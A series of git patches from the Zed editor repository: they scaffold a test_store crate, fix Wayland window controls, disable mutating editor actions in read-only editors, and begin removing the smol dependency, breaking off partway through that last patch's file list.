From 06d74b2eb474d437449d73c81624bf7ccaf6e81f Mon Sep 17 00:00:00 2001 From: BEKs Date: Fri, 24 Apr 2026 16:38:17 +0300 Subject: [PATCH 001/231] initial design for test_store feature --- Cargo.lock | 4 ++++ Cargo.toml | 1 + crates/test_store/Cargo.toml | 15 +++++++++++++++ crates/test_store/src/test_case.rs | 18 ++++++++++++++++++ crates/test_store/src/test_discovery.rs | 0 crates/test_store/src/test_store.rs | 21 +++++++++++++++++++++ crates/test_store/src/test_suite.rs | 16 ++++++++++++++++ 7 files changed, 75 insertions(+) create mode 100644 crates/test_store/Cargo.toml create mode 100644 crates/test_store/src/test_case.rs create mode 100644 crates/test_store/src/test_discovery.rs create mode 100644 crates/test_store/src/test_store.rs create mode 100644 crates/test_store/src/test_suite.rs diff --git a/Cargo.lock b/Cargo.lock index 05a2536b4ef455..29bd35ca97de9b 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -17849,6 +17849,10 @@ dependencies = [ "zed_actions", ] +[[package]] +name = "test_store" +version = "0.1.0" + [[package]] name = "text" version = "0.1.0" diff --git a/Cargo.toml b/Cargo.toml index 5d403c48c6fc97..b8462617ab367b 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -250,6 +250,7 @@ members = [ "tooling/compliance", "tooling/perf", "tooling/xtask", + "crates/test_store", ] default-members = ["crates/zed"] diff --git a/crates/test_store/Cargo.toml b/crates/test_store/Cargo.toml new file mode 100644 index 00000000000000..034213b9ba597b --- /dev/null +++ b/crates/test_store/Cargo.toml @@ -0,0 +1,15 @@ +[package] +name = "test_store" +version = "0.1.0" +publish.workspace = true +edition.workspace = true +license = "GPL-3.0-or-later" + +[lib] +path = "src/test_store.rs" +doctest = false + +[dependencies] + +[lints] +workspace = true diff --git a/crates/test_store/src/test_case.rs b/crates/test_store/src/test_case.rs new file mode 100644 index 00000000000000..72959ddef491d3 --- /dev/null +++ b/crates/test_store/src/test_case.rs @@ -0,0 +1,18 @@ +use 
crate::{State, Status}; + +#[derive(Debug, Clone)] +pub struct ErrorInfo {} + +#[derive(Debug, Clone, Default)] +pub struct TestCase { + // Tells the state that the test case is in + pub state: State, + // Tells the status of the test case after an execution round + pub status: Status, + // Tells the number of times the test case has been executed in this session + pub runs: u16, + // Tells the error information provided after the execution of the test case + pub error_info: Option, +} + +impl TestCase {} diff --git a/crates/test_store/src/test_discovery.rs b/crates/test_store/src/test_discovery.rs new file mode 100644 index 00000000000000..e69de29bb2d1d6 diff --git a/crates/test_store/src/test_store.rs b/crates/test_store/src/test_store.rs new file mode 100644 index 00000000000000..3a89460a82af86 --- /dev/null +++ b/crates/test_store/src/test_store.rs @@ -0,0 +1,21 @@ +pub mod test_case; +pub mod test_discovery; +pub mod test_suite; + +#[derive(Debug, Clone, Default)] +pub enum State { + Executed, + #[default] + NotExecuted, + Disabled, +} + +#[derive(Debug, Clone, Default)] +pub enum Status { + Pass, + Failed, + Skipped, + Crashed, + #[default] + Initialized, +} diff --git a/crates/test_store/src/test_suite.rs b/crates/test_store/src/test_suite.rs new file mode 100644 index 00000000000000..eb7e8990ff5a38 --- /dev/null +++ b/crates/test_store/src/test_suite.rs @@ -0,0 +1,16 @@ +use crate::{State, Status, test_case::TestCase}; + +#[derive(Debug, Clone, Default)] +pub struct TestSuite { + // Tells the state that the test case is in + pub state: State, + // Tells the status of the test case after an execution round + pub status: Status, + // Tells the number of times the test case has been executed in this session + pub runs: u16, + // Tells the number of test cases in the suite + pub count: u32, + // The test cases in the test suite + pub cases: Vec, +} +impl TestSuite {} From d6a7ad20324b8e26ac36c67b81f05f4adfbc527f Mon Sep 17 00:00:00 2001 From: Moulberry Date: 
Fri, 24 Apr 2026 18:10:12 +0800 Subject: [PATCH 002/231] Fix showing unsupported window controls on Linux Wayland (#50609) Release Notes: - Fixed showing unsupported window controls on Linux Wayland Before: image After: image Co-authored-by: Ben Kunkle --- crates/gpui_linux/src/linux/wayland/window.rs | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/crates/gpui_linux/src/linux/wayland/window.rs b/crates/gpui_linux/src/linux/wayland/window.rs index 9f2556fc2aea66..9862d307ef0f92 100644 --- a/crates/gpui_linux/src/linux/wayland/window.rs +++ b/crates/gpui_linux/src/linux/wayland/window.rs @@ -774,7 +774,12 @@ impl WaylandWindowStatePtr { } } xdg_toplevel::Event::WmCapabilities { capabilities } => { - let mut window_controls = WindowControls::default(); + let mut window_controls = WindowControls { + maximize: false, + minimize: false, + fullscreen: false, + window_menu: false, + }; let states = extract_states::(&capabilities); From 9140a99820029fcb70eab92f21beef85100c7c09 Mon Sep 17 00:00:00 2001 From: Kirill Bulatov Date: Fri, 24 Apr 2026 13:17:53 +0300 Subject: [PATCH 003/231] Exit early on mutating actions in readonly editor (#54758) Hides and disables all mutating editor actions for readonly editors. Certain actions (as cmd-backspace mentioned in the issue) could be somewhat beneficial to have for navigation purposes, but we'd better shape that story properly, let's build a "harness" and disable the mutating ones first. 
Closes https://github.com/zed-industries/zed/issues/47333 Release Notes: - Fixed readonly editor having certain mutation actions enabled --- crates/editor/src/editor.rs | 118 ++++++++++++++ crates/editor/src/element.rs | 298 ++++++++++++++++++----------------- 2 files changed, 268 insertions(+), 148 deletions(-) diff --git a/crates/editor/src/editor.rs b/crates/editor/src/editor.rs index d87729db8684b8..7d425fa98f4f03 100644 --- a/crates/editor/src/editor.rs +++ b/crates/editor/src/editor.rs @@ -6682,6 +6682,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) -> Option>> { + if self.read_only(cx) { + return None; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.do_completion(action.item_ix, CompletionIntent::Complete, window, cx) } @@ -6692,6 +6695,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) -> Option>> { + if self.read_only(cx) { + return None; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.do_completion(None, CompletionIntent::CompleteWithInsert, window, cx) } @@ -6702,6 +6708,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) -> Option>> { + if self.read_only(cx) { + return None; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.do_completion(None, CompletionIntent::CompleteWithReplace, window, cx) } @@ -7196,6 +7205,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) -> Option>> { + if self.read_only(cx) { + return None; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let actions_menu = @@ -8375,6 +8387,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { + if self.read_only(cx) { + return; + } if self.show_edit_predictions_in_menu() { self.hide_context_menu(window, cx); } @@ -11725,6 +11740,9 @@ impl Editor { } pub fn delete_line(&mut self, _: &DeleteLine, window: &mut Window, cx: &mut Context) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let display_map 
= self.display_map.update(cx, |map, cx| map.snapshot(cx)); let selections = self.selections.all::(&display_map); @@ -12018,6 +12036,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let snapshot = self.buffer.read(cx).snapshot(cx); @@ -12118,6 +12139,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let mut buffer_ids = HashSet::default(); let snapshot = self.buffer().read(cx).snapshot(cx); @@ -12137,6 +12161,9 @@ impl Editor { } pub fn git_restore(&mut self, _: &Restore, window: &mut Window, cx: &mut Context) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let selections = self .selections @@ -12156,6 +12183,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { + if self.read_only(cx) { + return; + } let selections = self .selections .all(&self.display_snapshot(cx)) @@ -12563,6 +12593,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let display_snapshot = self.display_snapshot(cx); @@ -12801,6 +12834,9 @@ impl Editor { } fn rotate_selections(&mut self, window: &mut Window, cx: &mut Context, reverse: bool) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let display_snapshot = self.display_snapshot(cx); let selections = self.selections.all::(&display_snapshot); @@ -12952,6 +12988,9 @@ impl Editor { ) where M: FnMut(&str) -> LineManipulationResult, { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); @@ -13371,6 +13410,10 @@ impl Editor { where Fn: FnMut(&str) -> String, 
{ + if self.read_only(cx) { + return; + } + self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let buffer = self.buffer.read(cx).snapshot(cx); let mut new_selections = Vec::new(); @@ -13467,6 +13510,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); @@ -13612,6 +13658,9 @@ impl Editor { } pub fn move_line_up(&mut self, _: &MoveLineUp, window: &mut Window, cx: &mut Context) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); if self.mode.is_single_line() { cx.propagate(); @@ -13723,6 +13772,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); if self.mode.is_single_line() { cx.propagate(); @@ -13817,6 +13869,9 @@ impl Editor { } pub fn transpose(&mut self, _: &Transpose, window: &mut Window, cx: &mut Context) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let text_layout_details = &self.text_layout_details(window, cx); self.transact(window, cx, |this, window, cx| { @@ -13879,6 +13934,9 @@ impl Editor { } pub fn rewrap(&mut self, _: &Rewrap, _: &mut Window, cx: &mut Context) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); if self.mode.is_single_line() { cx.propagate(); @@ -13889,6 +13947,9 @@ impl Editor { } pub fn rewrap_impl(&mut self, options: RewrapOptions, cx: &mut Context) { + if self.read_only(cx) { + return; + } let buffer = self.buffer.read(cx).snapshot(cx); let selections = self.selections.all::(&self.display_snapshot(cx)); @@ -14335,12 +14396,18 @@ impl Editor { } pub fn cut(&mut self, _: &Cut, window: &mut Window, cx: &mut Context) { + if self.read_only(cx) { + return; + 
} self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let item = self.cut_common(true, window, cx); cx.write_to_clipboard(item); } pub fn kill_ring_cut(&mut self, _: &KillRingCut, window: &mut Window, cx: &mut Context) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.change_selections(SelectionEffects::no_scroll(), window, cx, |s| { s.move_with(&mut |snapshot, sel| { @@ -14707,6 +14774,9 @@ impl Editor { } pub fn paste(&mut self, _: &Paste, window: &mut Window, cx: &mut Context) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); if let Some(item) = cx.read_from_clipboard() { let clipboard_string = item.entries().iter().find_map(|entry| match entry { @@ -15342,6 +15412,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { this.select_autoclose_pair(window, cx); @@ -15373,6 +15446,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { this.select_autoclose_pair(window, cx); @@ -15460,6 +15536,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { this.change_selections(Default::default(), window, cx, |s| { @@ -15490,6 +15569,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { this.change_selections(Default::default(), window, cx, |s| { @@ -15566,6 +15648,9 @@ impl Editor { window: &mut Window, cx: &mut 
Context, ) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { this.change_selections(Default::default(), window, cx, |s| { @@ -15626,6 +15711,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { this.select_to_end_of_line( @@ -15645,6 +15733,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { this.select_to_end_of_line( @@ -17614,6 +17705,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); let buffer = self.buffer.read(cx).snapshot(cx); @@ -19726,6 +19820,9 @@ impl Editor { ) -> Option>> { use language::ToOffset as _; + if self.read_only(cx) { + return None; + } let provider = self.semantics_provider.clone()?; let selection = self.selections.newest_anchor().clone(); let (cursor_buffer, cursor_buffer_position) = self @@ -19914,6 +20011,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) -> Option>> { + if self.read_only(cx) { + return None; + } let rename = self.take_rename(false, window, cx)?; let workspace = self.workspace()?.downgrade(); let (buffer, start) = self @@ -20034,6 +20134,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) -> Option>> { + if self.read_only(cx) { + return None; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let project = match &self.project { @@ -20056,6 +20159,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) -> Option>> { + if self.read_only(cx) { + return None; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let project = match 
&self.project { @@ -20175,6 +20281,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) -> Option>> { + if self.read_only(cx) { + return None; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let project = match &self.project { Some(project) => project.clone(), @@ -21756,6 +21865,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let buffers = self.buffer.read(cx).all_buffers(); @@ -21786,6 +21898,9 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let snapshot = self.snapshot(window, cx); let hunks = snapshot.hunks_for_ranges( @@ -24123,6 +24238,9 @@ impl Editor { } fn insert_uuid(&mut self, version: UuidVersion, window: &mut Window, cx: &mut Context) { + if self.read_only(cx) { + return; + } self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { let edits = this diff --git a/crates/editor/src/element.rs b/crates/editor/src/element.rs index dd10b734d9fe3b..c52a0d76bdbc47 100644 --- a/crates/editor/src/element.rs +++ b/crates/editor/src/element.rs @@ -249,65 +249,12 @@ impl EditorElement { register_action(editor, window, Editor::select_page_down); register_action(editor, window, Editor::select_page_up); register_action(editor, window, Editor::cancel); - register_action(editor, window, Editor::newline); - register_action(editor, window, Editor::newline_above); - register_action(editor, window, Editor::newline_below); - register_action(editor, window, Editor::backspace); register_action(editor, window, Editor::blame_hover); - register_action(editor, window, Editor::delete); - register_action(editor, window, Editor::tab); register_action(editor, window, Editor::next_snippet_tabstop); register_action(editor, window, Editor::previous_snippet_tabstop); - 
register_action(editor, window, Editor::backtab); - register_action(editor, window, Editor::indent); - register_action(editor, window, Editor::outdent); - register_action(editor, window, Editor::autoindent); - register_action(editor, window, Editor::delete_line); - register_action(editor, window, Editor::join_lines); - register_action(editor, window, Editor::sort_lines_by_length); - register_action(editor, window, Editor::sort_lines_case_sensitive); - register_action(editor, window, Editor::sort_lines_case_insensitive); - register_action(editor, window, Editor::reverse_lines); - register_action(editor, window, Editor::shuffle_lines); - register_action(editor, window, Editor::rotate_selections_forward); - register_action(editor, window, Editor::rotate_selections_backward); - register_action(editor, window, Editor::convert_indentation_to_spaces); - register_action(editor, window, Editor::convert_indentation_to_tabs); - register_action(editor, window, Editor::convert_to_upper_case); - register_action(editor, window, Editor::convert_to_lower_case); - register_action(editor, window, Editor::convert_to_title_case); - register_action(editor, window, Editor::convert_to_snake_case); - register_action(editor, window, Editor::convert_to_kebab_case); - register_action(editor, window, Editor::convert_to_upper_camel_case); - register_action(editor, window, Editor::convert_to_lower_camel_case); - register_action(editor, window, Editor::convert_to_opposite_case); - register_action(editor, window, Editor::convert_to_sentence_case); - register_action(editor, window, Editor::toggle_case); - register_action(editor, window, Editor::convert_to_rot13); - register_action(editor, window, Editor::convert_to_rot47); - register_action(editor, window, Editor::delete_to_previous_word_start); - register_action(editor, window, Editor::delete_to_previous_subword_start); - register_action(editor, window, Editor::delete_to_next_word_end); - register_action(editor, window, 
Editor::delete_to_next_subword_end); - register_action(editor, window, Editor::delete_to_beginning_of_line); - register_action(editor, window, Editor::delete_to_end_of_line); - register_action(editor, window, Editor::cut_to_end_of_line); - register_action(editor, window, Editor::duplicate_line_up); - register_action(editor, window, Editor::duplicate_line_down); - register_action(editor, window, Editor::duplicate_selection); - register_action(editor, window, Editor::move_line_up); - register_action(editor, window, Editor::move_line_down); - register_action(editor, window, Editor::transpose); - register_action(editor, window, Editor::rewrap); - register_action(editor, window, Editor::cut); - register_action(editor, window, Editor::kill_ring_cut); - register_action(editor, window, Editor::kill_ring_yank); register_action(editor, window, Editor::copy); register_action(editor, window, Editor::copy_and_trim); register_action(editor, window, Editor::diff_clipboard_with_selection); - register_action(editor, window, Editor::paste); - register_action(editor, window, Editor::undo); - register_action(editor, window, Editor::redo); register_action(editor, window, Editor::move_page_up); register_action(editor, window, Editor::move_page_down); register_action(editor, window, Editor::next_screen); @@ -324,16 +271,6 @@ impl EditorElement { register_action(editor, window, |editor, _: &HalfPageDown, window, cx| { editor.scroll_screen(&ScrollAmount::Page(0.5), window, cx) }); - register_action( - editor, - window, - |editor, HandleInput(text): &HandleInput, window, cx| { - if text.is_empty() { - return; - } - editor.handle_input(text, window, cx); - }, - ); register_action(editor, window, |editor, _: &HalfPageUp, window, cx| { editor.scroll_screen(&ScrollAmount::Page(-0.5), window, cx) }); @@ -396,8 +333,6 @@ impl EditorElement { register_action(editor, window, |editor, action, window, cx| { editor.find_previous_match(action, window, cx).log_err(); }); - register_action(editor, 
window, Editor::toggle_comments); - register_action(editor, window, Editor::toggle_block_comments); register_action(editor, window, Editor::select_larger_syntax_node); register_action(editor, window, Editor::select_smaller_syntax_node); register_action(editor, window, Editor::select_next_syntax_node); @@ -408,7 +343,6 @@ impl EditorElement { Editor::select_to_start_of_larger_syntax_node, ); register_action(editor, window, Editor::select_to_end_of_larger_syntax_node); - register_action(editor, window, Editor::unwrap_syntax_node); register_action(editor, window, Editor::move_to_start_of_larger_syntax_node); register_action(editor, window, Editor::move_to_end_of_larger_syntax_node); register_action(editor, window, Editor::select_enclosing_symbol); @@ -546,54 +480,9 @@ impl EditorElement { register_action(editor, window, Editor::go_to_next_reference); register_action(editor, window, Editor::go_to_previous_symbol); register_action(editor, window, Editor::go_to_next_symbol); - - register_action(editor, window, |editor, action, window, cx| { - if let Some(task) = editor.format(action, window, cx) { - editor.detach_and_notify_err(task, window, cx); - } else { - cx.propagate(); - } - }); - if editor.read(cx).can_format_selections(cx) { - register_action(editor, window, |editor, action, window, cx| { - if let Some(task) = editor.format_selections(action, window, cx) { - editor.detach_and_notify_err(task, window, cx); - } else { - cx.propagate(); - } - }); - } - register_action(editor, window, |editor, action, window, cx| { - if let Some(task) = editor.organize_imports(action, window, cx) { - editor.detach_and_notify_err(task, window, cx); - } else { - cx.propagate(); - } - }); register_action(editor, window, Editor::restart_language_server); register_action(editor, window, Editor::stop_language_server); register_action(editor, window, Editor::show_character_palette); - register_action(editor, window, |editor, action, window, cx| { - if let Some(task) = 
editor.confirm_completion(action, window, cx) { - editor.detach_and_notify_err(task, window, cx); - } else { - cx.propagate(); - } - }); - register_action(editor, window, |editor, action, window, cx| { - if let Some(task) = editor.confirm_completion_replace(action, window, cx) { - editor.detach_and_notify_err(task, window, cx); - } else { - cx.propagate(); - } - }); - register_action(editor, window, |editor, action, window, cx| { - if let Some(task) = editor.confirm_completion_insert(action, window, cx) { - editor.detach_and_notify_err(task, window, cx); - } else { - cx.propagate(); - } - }); register_action(editor, window, |editor, action, window, cx| { if let Some(task) = editor.compose_completion(action, window, cx) { editor.detach_and_notify_err(task, window, cx); @@ -601,27 +490,6 @@ impl EditorElement { cx.propagate(); } }); - register_action(editor, window, |editor, action, window, cx| { - if let Some(task) = editor.confirm_code_action(action, window, cx) { - editor.detach_and_notify_err(task, window, cx); - } else { - cx.propagate(); - } - }); - register_action(editor, window, |editor, action, window, cx| { - if let Some(task) = editor.rename(action, window, cx) { - editor.detach_and_notify_err(task, window, cx); - } else { - cx.propagate(); - } - }); - register_action(editor, window, |editor, action, window, cx| { - if let Some(task) = editor.confirm_rename(action, window, cx) { - editor.detach_and_notify_err(task, window, cx); - } else { - cx.propagate(); - } - }); register_action(editor, window, |editor, action, window, cx| { if let Some(task) = editor.find_all_references(action, window, cx) { task.detach_and_log_err(cx); @@ -638,21 +506,8 @@ impl EditorElement { register_action(editor, window, Editor::context_menu_next); register_action(editor, window, Editor::context_menu_last); register_action(editor, window, Editor::display_cursor_names); - register_action(editor, window, Editor::unique_lines_case_insensitive); - register_action(editor, window, 
Editor::unique_lines_case_sensitive); - register_action(editor, window, Editor::accept_next_word_edit_prediction); - register_action(editor, window, Editor::accept_next_line_edit_prediction); - register_action(editor, window, Editor::accept_edit_prediction); - register_action(editor, window, Editor::restore_file); - register_action(editor, window, Editor::git_restore); - register_action(editor, window, Editor::restore_and_next); - register_action(editor, window, Editor::apply_all_diff_hunks); - register_action(editor, window, Editor::apply_selected_diff_hunks); register_action(editor, window, Editor::open_active_item_in_terminal); - register_action(editor, window, Editor::reload_file); register_action(editor, window, Editor::spawn_nearest_task); - register_action(editor, window, Editor::insert_uuid_v4); - register_action(editor, window, Editor::insert_uuid_v7); register_action(editor, window, Editor::open_selections_in_multibuffer); register_action(editor, window, Editor::toggle_bookmark); register_action(editor, window, Editor::go_to_next_bookmark); @@ -662,9 +517,156 @@ impl EditorElement { register_action(editor, window, Editor::enable_breakpoint); register_action(editor, window, Editor::disable_breakpoint); register_action(editor, window, Editor::toggle_read_only); - register_action(editor, window, Editor::align_selections); - if editor.read(cx).enable_wrap_selections_in_tag(cx) { - register_action(editor, window, Editor::wrap_selections_in_tag); + register_action(editor, window, Editor::reload_file); + + if !editor.read(cx).read_only(cx) { + register_action(editor, window, Editor::newline); + register_action(editor, window, Editor::newline_above); + register_action(editor, window, Editor::newline_below); + register_action(editor, window, Editor::backspace); + register_action(editor, window, Editor::delete); + register_action(editor, window, Editor::tab); + register_action(editor, window, Editor::backtab); + register_action(editor, window, Editor::indent); + 
register_action(editor, window, Editor::outdent); + register_action(editor, window, Editor::autoindent); + register_action(editor, window, Editor::delete_line); + register_action(editor, window, Editor::join_lines); + register_action(editor, window, Editor::sort_lines_by_length); + register_action(editor, window, Editor::sort_lines_case_sensitive); + register_action(editor, window, Editor::sort_lines_case_insensitive); + register_action(editor, window, Editor::unique_lines_case_insensitive); + register_action(editor, window, Editor::unique_lines_case_sensitive); + register_action(editor, window, Editor::reverse_lines); + register_action(editor, window, Editor::shuffle_lines); + register_action(editor, window, Editor::rotate_selections_forward); + register_action(editor, window, Editor::rotate_selections_backward); + register_action(editor, window, Editor::convert_indentation_to_spaces); + register_action(editor, window, Editor::convert_indentation_to_tabs); + register_action(editor, window, Editor::convert_to_upper_case); + register_action(editor, window, Editor::convert_to_lower_case); + register_action(editor, window, Editor::convert_to_title_case); + register_action(editor, window, Editor::convert_to_snake_case); + register_action(editor, window, Editor::convert_to_kebab_case); + register_action(editor, window, Editor::convert_to_upper_camel_case); + register_action(editor, window, Editor::convert_to_lower_camel_case); + register_action(editor, window, Editor::convert_to_opposite_case); + register_action(editor, window, Editor::convert_to_sentence_case); + register_action(editor, window, Editor::toggle_case); + register_action(editor, window, Editor::convert_to_rot13); + register_action(editor, window, Editor::convert_to_rot47); + register_action(editor, window, Editor::delete_to_previous_word_start); + register_action(editor, window, Editor::delete_to_previous_subword_start); + register_action(editor, window, Editor::delete_to_next_word_end); + 
register_action(editor, window, Editor::delete_to_next_subword_end); + register_action(editor, window, Editor::delete_to_beginning_of_line); + register_action(editor, window, Editor::delete_to_end_of_line); + register_action(editor, window, Editor::cut_to_end_of_line); + register_action(editor, window, Editor::duplicate_line_up); + register_action(editor, window, Editor::duplicate_line_down); + register_action(editor, window, Editor::duplicate_selection); + register_action(editor, window, Editor::move_line_up); + register_action(editor, window, Editor::move_line_down); + register_action(editor, window, Editor::transpose); + register_action(editor, window, Editor::rewrap); + register_action(editor, window, Editor::cut); + register_action(editor, window, Editor::kill_ring_cut); + register_action(editor, window, Editor::kill_ring_yank); + register_action(editor, window, Editor::paste); + register_action(editor, window, Editor::undo); + register_action(editor, window, Editor::redo); + register_action(editor, window, Editor::toggle_comments); + register_action(editor, window, Editor::toggle_block_comments); + register_action(editor, window, Editor::unwrap_syntax_node); + register_action(editor, window, Editor::accept_next_word_edit_prediction); + register_action(editor, window, Editor::accept_next_line_edit_prediction); + register_action(editor, window, Editor::accept_edit_prediction); + register_action(editor, window, Editor::restore_file); + register_action(editor, window, Editor::git_restore); + register_action(editor, window, Editor::restore_and_next); + register_action(editor, window, Editor::apply_all_diff_hunks); + register_action(editor, window, Editor::apply_selected_diff_hunks); + register_action(editor, window, Editor::insert_uuid_v4); + register_action(editor, window, Editor::insert_uuid_v7); + register_action(editor, window, Editor::align_selections); + if editor.read(cx).enable_wrap_selections_in_tag(cx) { + register_action(editor, window, 
Editor::wrap_selections_in_tag); + } + register_action( + editor, + window, + |editor, HandleInput(text): &HandleInput, window, cx| { + if text.is_empty() { + return; + } + editor.handle_input(text, window, cx); + }, + ); + register_action(editor, window, |editor, action, window, cx| { + if let Some(task) = editor.format(action, window, cx) { + editor.detach_and_notify_err(task, window, cx); + } else { + cx.propagate(); + } + }); + if editor.read(cx).can_format_selections(cx) { + register_action(editor, window, |editor, action, window, cx| { + if let Some(task) = editor.format_selections(action, window, cx) { + editor.detach_and_notify_err(task, window, cx); + } else { + cx.propagate(); + } + }); + } + register_action(editor, window, |editor, action, window, cx| { + if let Some(task) = editor.organize_imports(action, window, cx) { + editor.detach_and_notify_err(task, window, cx); + } else { + cx.propagate(); + } + }); + register_action(editor, window, |editor, action, window, cx| { + if let Some(task) = editor.confirm_completion(action, window, cx) { + editor.detach_and_notify_err(task, window, cx); + } else { + cx.propagate(); + } + }); + register_action(editor, window, |editor, action, window, cx| { + if let Some(task) = editor.confirm_completion_replace(action, window, cx) { + editor.detach_and_notify_err(task, window, cx); + } else { + cx.propagate(); + } + }); + register_action(editor, window, |editor, action, window, cx| { + if let Some(task) = editor.confirm_completion_insert(action, window, cx) { + editor.detach_and_notify_err(task, window, cx); + } else { + cx.propagate(); + } + }); + register_action(editor, window, |editor, action, window, cx| { + if let Some(task) = editor.confirm_code_action(action, window, cx) { + editor.detach_and_notify_err(task, window, cx); + } else { + cx.propagate(); + } + }); + register_action(editor, window, |editor, action, window, cx| { + if let Some(task) = editor.rename(action, window, cx) { + 
editor.detach_and_notify_err(task, window, cx); + } else { + cx.propagate(); + } + }); + register_action(editor, window, |editor, action, window, cx| { + if let Some(task) = editor.confirm_rename(action, window, cx) { + editor.detach_and_notify_err(task, window, cx); + } else { + cx.propagate(); + } + }); } } From 2eb012fc9c91301a041595de88289975d21e0d9c Mon Sep 17 00:00:00 2001 From: Lukas Wirth Date: Fri, 24 Apr 2026 12:29:51 +0200 Subject: [PATCH 004/231] Remove smol as a dependency from a bunch of crates (#53603) We aren't making use of it in these crates and it unblocks some web-related work Release Notes: - N/A or Added/Fixed/Improved ... --- Cargo.lock | 87 +++++++------- Cargo.toml | 4 +- crates/acp_thread/Cargo.toml | 2 +- crates/acp_thread/src/acp_thread.rs | 4 +- crates/acp_thread/src/connection.rs | 2 +- crates/agent/Cargo.toml | 3 +- crates/agent/src/agent.rs | 8 +- crates/agent/src/edit_agent/evals.rs | 2 +- .../src/tools/evals/streaming_edit_file.rs | 2 +- crates/agent_servers/Cargo.toml | 2 +- crates/agent_servers/src/acp.rs | 20 ++-- crates/agent_ui/Cargo.toml | 2 +- crates/agent_ui/src/buffer_codegen.rs | 2 +- crates/agent_ui/src/inline_assistant.rs | 2 +- crates/agent_ui/src/thread_metadata_store.rs | 14 +-- crates/agent_ui/src/threads_archive_view.rs | 4 +- crates/client/Cargo.toml | 1 + crates/client/src/client.rs | 10 +- crates/cloud_api_client/Cargo.toml | 2 +- crates/cloud_api_client/src/llm_token.rs | 2 +- crates/collab/Cargo.toml | 1 + .../collab/tests/integration/editor_tests.rs | 4 +- 